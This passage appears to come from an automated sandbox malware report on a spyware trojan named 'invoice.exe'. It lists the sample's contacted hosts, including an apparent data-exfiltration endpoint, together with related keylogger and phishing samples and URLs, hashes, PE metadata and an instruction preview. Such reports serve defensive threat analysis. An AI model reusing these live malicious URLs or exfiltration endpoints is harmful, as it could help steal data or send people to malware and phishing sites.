http://ocsp.sectigo.com0=	invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	invoice.exe, 00000002.00000002.4138430220.0000000004312000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004564000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004441000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000446C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000429D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.use(?RE	invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
198.54.114.247	foxwagon-equipment.com	United States	22612	NAMECHEAP-NETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523121
Start date and time:	2024-10-01 06:15:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	invoice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@6/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 119 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target invoice.exe, PID 7644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:15:58	API Interceptor	12062587x Sleep call for process: invoice.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
132.226.247.73	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	REMITTANCE ADVICE.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
api.telegram.org	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse	149.154.167.220
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3D	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://booking.com-partners.one/confirm/login/qAlElVVF	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://jv.prenticeu.com/SAFlSIeECgRZt_tUKXhAOQHYyqb5e4/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	msimg32.dll	Get hash	malicious	LummaC	Browse	172.67.197.40
	https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.31.174
	msimg32.dll	Get hash	malicious	Unknown	Browse	172.67.197.40
	http://www.toyotanation.com//help//terms	Get hash	malicious	Unknown	Browse	172.67.41.60
	https://bestratedrobotvacuum.com/?bypass-cdn=1	Get hash	malicious	Unknown	Browse	104.21.234.234
	https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=	Get hash	malicious	Unknown	Browse	104.26.4.103
NAMECHEAP-NETUS	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.238
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	update SOA.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	shipping documents_pdf.exe	Get hash	malicious	FormBook	Browse	162.213.249.216
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.238
	Quote #260924.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	http://telegram-sex-naughty18.pages.dev/	Get hash	malicious	Porn Scam	Browse	162.213.255.57
	https://purtroppopurtroppo-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lca	Get hash	malicious	Unknown	Browse	63.250.43.5
	https://tuttavia-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lca	Get hash	malicious	Unknown	Browse	63.250.43.129
	https://panthersaenimoine-fabc74.ingress-bonde.ewp.live/wp-content/plugins/abinbrevie/pages/region.php?lca	Get hash	malicious	Unknown	Browse	63.250.43.2
UTMEMUS	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	new shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	http://azgop.org/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uvDYInLodR.exe	Get hash	malicious	Njrat	Browse	188.114.96.3
	uvDYInLodR.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Printable_Copy.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	Printable_Copy.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	DRAFT_PO.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.862460524737662
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	invoice.exe
File size:	796'168 bytes
MD5:	69f5ec778e467c7d87f15b201c893816
SHA1:	4e2b63cce411847e95177765064b3fc03463590b
SHA256:	a433aa981a5cbfd5fae678c523b088d034f61f57dcb61232fbaba73657867b36
SHA512:	8c31ed6c55abfb8d4e5ab9f8b39d05571a583322385a7fc28427f48326ec5e43e9c66c99748e0c53cbc98c904175ffa82aac5d539121c095dda06355b6b7890b
SSDEEP:	24576:vOGaAeBqAiwCZDOwl3UYfWFEBftBW2Zye:4LgAiTZDhlRWFEBVw2ZF
TLSH:	FD0501089EEDDE19D4BD9B799AB0512487B5B49AA273F34F1ECA14F18D223C0C924F53
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4c021e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FAA88F [Mon Sep 30 13:33:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
